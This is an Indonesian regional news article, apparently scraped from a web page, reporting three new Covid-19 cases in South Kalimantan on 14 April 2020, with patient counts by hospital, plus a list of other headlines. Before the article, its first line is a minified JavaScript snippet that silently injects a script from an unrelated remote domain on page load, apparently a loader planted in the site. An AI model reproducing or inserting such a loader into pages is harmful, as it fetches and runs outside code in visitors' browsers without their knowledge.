(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

UPDATE. 3 Kasus Baru Covid-19 di Kalsel, PDP Ulin 44 yang Meninggal Dinyatakan Terpapar!


KANALKALIMANTAN.COM, BANJARBARU – Gugus Tugas Pencegahan Pengendalian Penanganan (P3) Covid-19 di Kalimantan Selatan, menyatakan ada 3 kasus baru covid-19, Selasa (14/4/2020) sore. Jubir Percepatan Penanganan Covid 19 Kalsel, M Muslim, menerangkan bahwa  temuan kasus positif tersebut terjadi pada PDP Ulin 43, PDP BJ 3, serta PDP Ulin 44.

Terkhusus untuk PDP Ulin 44, telah meninggal dunia pada 12 April 2020 lalu. Namun hasil  uji spesimen dari laboratorium baru diterima tim medis beberapa hari ini dan dinyatakan positif terpapar covid-19.

”Dengan temuan 3 kasus positif Covid hari ini, maka kasus positif di Kalsel menjadi 37 kasus. Dirincikan bahwa 5 orang diantaranya meninggal, sembuh 3 pasien, dan selebihnya 29 pasien masih dirawat,” papar Muslim dalam keterangan pers di Command center Banjarbaru.

Dari 29 pasien positif yang menjalani perawatan, 6 pasien diantaranya hanya menjalani isolasi mandiri dengan pantauan petugas medis. Sedangkan 23 pasien lainnya saat ini di rawat beberapara rumah sakit ; di RS Ulin 15 pasien, RS Ansyari Saleh 3 pasien, RS Batola 2 pasien, dan RS  Boejassin Tala dirawat 2 pasien.

Kondisi pasien positif di RS Ulin mayoritas kondisinya membaik dan dalam keadaan stabil. Hanya pasien berkode KS Covid#6,20, 30, 35 yang masih mengalami gejala sesak nafas dan kondisi masih lemah.

Kondisi pasien positif di RS Ansari Saleh seluruhnya dalam kondisi stabil. Sedang pasien positif di RS Boejassin, dari 3 pasien yang dirawat, hanya KSCovid#36 masih mengalami sesak nafas.

Kondisi 2 pasien positif di RS Abdul Aziz Batola semua dalam kondisi stabil, begitu juga 6 pasien yang menjalani isolasi mandiri.

Sementara jumlah pasien dalam pengawasan (PDP) sebanyak 18 orang. Sebanyak 6 pasien dirawat di RS Ulin, 2 pasien di RS Ansari Saleh, 2 pasien di RS Batola, 1 pasien di RS Boejassin, 3 pasien di RS Hassan Basery Kandangan, 3 pasien di RSIdaman Banjarbaru, dan menjalani isolasi mandiri sebanyak 2 orang.

Rata-rata pasien PDP dalam keadaan stabil. Namun PDP Ulin 46, ulin 47, ulin 48, HB 1, HB 2 , dan HB 3 masih mengalami sesak nafas. ”Sedangkan PDP di RS Idaman, RS Ansyari Saleh maupun RS Boejassin semua dalam keadaan stabil,” tambah Muslim.

Dilaporkan juga jumlah ODP per hari ini tercatat 1227 orang, berkurang 5 orang dibanding sehari sebelumnya. (kanalkalimantan.com/rico)

 

Reporter : Rico
Editor : Cell

 


Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

2 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

4 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

4 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

5 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

6 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

8 jam ago

This website uses cookies.